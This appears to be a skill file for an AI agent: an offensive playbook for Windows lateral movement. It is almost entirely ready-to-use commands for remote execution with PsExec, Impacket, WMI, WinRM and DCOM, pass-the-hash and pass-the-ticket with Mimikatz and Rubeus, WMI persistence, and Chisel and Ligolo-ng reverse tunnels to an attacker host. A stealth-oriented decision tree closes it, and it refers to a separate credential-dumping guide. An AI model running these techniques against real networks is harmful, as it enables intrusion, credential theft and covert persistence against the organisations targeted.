SKILL.md
$27
Also load CREDENTIAL_DUMPING.md when you need:
- LSASS dump techniques (MiniDump, comsvcs.dll, nanodump)
- SAM/SYSTEM/SECURITY extraction
- DPAPI, credential manager, cached domain credentials
- NTDS.dit extraction methods
1. REMOTE EXECUTION METHODS COMPARISON
Method
Port
Cred Type
Creates Service?
File on Disk?
OPSEC
Admin Required?
PsExec
445 (SMB)
Password/Hash
Yes (PSEXESVC)
Yes (.exe)
Low
Yes
Impacket smbexec
445
Password/Hash
Yes (temp service)
No
Medium
Yes
Impacket atexec
445
Password/Hash
No (scheduled task)
No
Medium
Yes
WMI
135+dynamic
Password/Hash
No
No
High
Yes
WinRM
5985/5986
Password/Hash/Ticket
No
No
High
Yes (Remote Mgmt)
DCOM
135+dynamic
Password/Hash
No
No
High
Yes
RDP
3389
Password/Hash (RestrictedAdmin)
No
No
Low (GUI session)
RDP access
SSH
22
Password/Key
No
No
High
SSH enabled
SC
445
Password/Hash
Yes (custom service)
Yes
Low
Yes
2. PSEXEC VARIANTS
Impacket PsExec
# With password
psexec.py DOMAIN/administrator:password@TARGET_IP
# With NTLM hash (pass-the-hash)
psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
# With Kerberos ticket
export KRB5CCNAME=admin.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.comImpacket smbexec (Stealthier — No Binary Upload)
smbexec.py DOMAIN/administrator:password@TARGET_IP
smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IPImpacket atexec (Scheduled Task)
atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"
atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"Sysinternals PsExec
PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe
PsExec64.exe \\TARGET -s cmd.exe & REM Run as SYSTEM (-s)
PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"3. WMI LATERAL MOVEMENT
# Impacket wmiexec
wmiexec.py DOMAIN/administrator:password@TARGET_IP
wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
# With Kerberos
export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com# PowerShell WMI process creation
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
# WMI event subscription persistence
$filterArgs = @{
EventNamespace = 'root\cimv2'; Name = 'Updater';
QueryLanguage = 'WQL';
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs4. WINRM LATERAL MOVEMENT
# evil-winrm (from Linux — with password)
evil-winrm -i TARGET_IP -u administrator -p password
# evil-winrm (with hash)
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH
# evil-winrm (with Kerberos)
evil-winrm -i target.domain.com -r DOMAIN.COM# PowerShell remoting
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
# Execute command remotely
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
# Multiple targets simultaneously
Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }5. DCOM LATERAL MOVEMENT
Stealthy — uses legitimate COM objects, no service creation.
MMC20.Application
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\out.txt","7")ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\temp\out.txt","C:\Windows\System32",$null,0)ShellBrowserWindow
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))
$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)Impacket dcomexec
dcomexec.py DOMAIN/administrator:password@TARGET_IP
dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC206. PASS-THE-HASH (PTH)
Use NTLM hash directly without knowing the plaintext password.
# CrackMapExec — spray/check admin access
crackmapexec smb TARGETS -u administrator -H NTLM_HASH
# Impacket tools (all support -hashes)
psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
# evil-winrm
evil-winrm -i TARGET -u user -H NTLM_HASH
# xfreerdp (Restricted Admin mode must be enabled)
xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN# Mimikatz PTH (spawns new process with injected creds)
sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exeEnable Restricted Admin for RDP PTH
# On target (requires admin): enable restricted admin
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f7. OVERPASS-THE-HASH (PASS-THE-KEY)
Convert NTLM hash → Kerberos TGT → pure Kerberos authentication.
# Request TGT with hash
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
# Or with AES256 key
getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP
# Use Kerberos for all subsequent tools
psexec.py -k -no-pass DOMAIN/user@target.domain.com
wmiexec.py -k -no-pass DOMAIN/user@target.domain.com# Mimikatz overpass-the-hash
sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe
# New PowerShell session → klist shows Kerberos TGTAdvantage: Pure Kerberos auth avoids NTLM logging and detection.
8. PASS-THE-TICKET
# Use existing .ccache ticket
export KRB5CCNAME=/path/to/admin.ccache
psexec.py -k -no-pass DOMAIN/admin@target.domain.com# Mimikatz — inject .kirbi ticket
kerberos::ptt ticket.kirbi
# Verify
klist
# Rubeus
Rubeus.exe ptt /ticket:base64_blob9. PIVOTING THROUGH COMPROMISED HOSTS
SSH Tunnel / Port Forward
# Dynamic SOCKS proxy through compromised host
ssh -D 1080 user@COMPROMISED_HOST
# Use with proxychains
# Local port forward (access internal service)
ssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOSTChisel (No SSH Needed)
# On attacker (server)
chisel server --reverse -p 8080
# On compromised host (client)
chisel client ATTACKER:8080 R:socks
# Creates SOCKS5 proxy on attacker's port 1080Ligolo-ng (Modern, Fast)
# On attacker
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# On compromised host
ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert
# In ligolo console
session # Select agent
start # Start tunnel
# Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo10. LATERAL MOVEMENT DECISION TREE
Have credentials / hash — need to move laterally
│
├── What credentials do you have?
│ ├── Plaintext password → any method
│ ├── NTLM hash → PTH methods (§6)
│ │ ├── Need stealthier? → Overpass-the-Hash first (§7)
│ │ └── Direct use → psexec/wmiexec/evil-winrm with -H
│ ├── Kerberos ticket → Pass-the-Ticket (§8)
│ └── AES key → Overpass-the-Hash with -aesKey (§7)
│
├── OPSEC priority?
│ ├── High stealth needed
│ │ ├── WMI (no file on disk, no service) → wmiexec (§3)
│ │ ├── DCOM (uses legitimate COM) → dcomexec (§5)
│ │ └── WinRM (PowerShell remoting) → evil-winrm (§4)
│ ├── Moderate stealth
│ │ ├── smbexec (no binary upload) (§2)
│ │ └── atexec (scheduled task, auto-cleanup) (§2)
│ └── Low stealth acceptable
│ ├── PsExec (reliable, creates service) (§2)
│ └── RDP (interactive GUI) (§6)
│
├── Need to pivot to internal network?
│ ├── SSH available → SSH tunnel / SOCKS (§9)
│ ├── No SSH → Chisel or Ligolo-ng (§9)
│ └── Multiple hops → chain SOCKS proxies
│
├── Target hardening?
│ ├── SMB signing required → WMI, WinRM, or DCOM
│ ├── WinRM disabled → WMI or DCOM
│ ├── Firewall blocks 135/445 → RDP or SSH
│ └── Restricted Admin disabled → no RDP PTH → use other methods
│
└── Need to dump creds on new host?
└── Load CREDENTIAL_DUMPING.md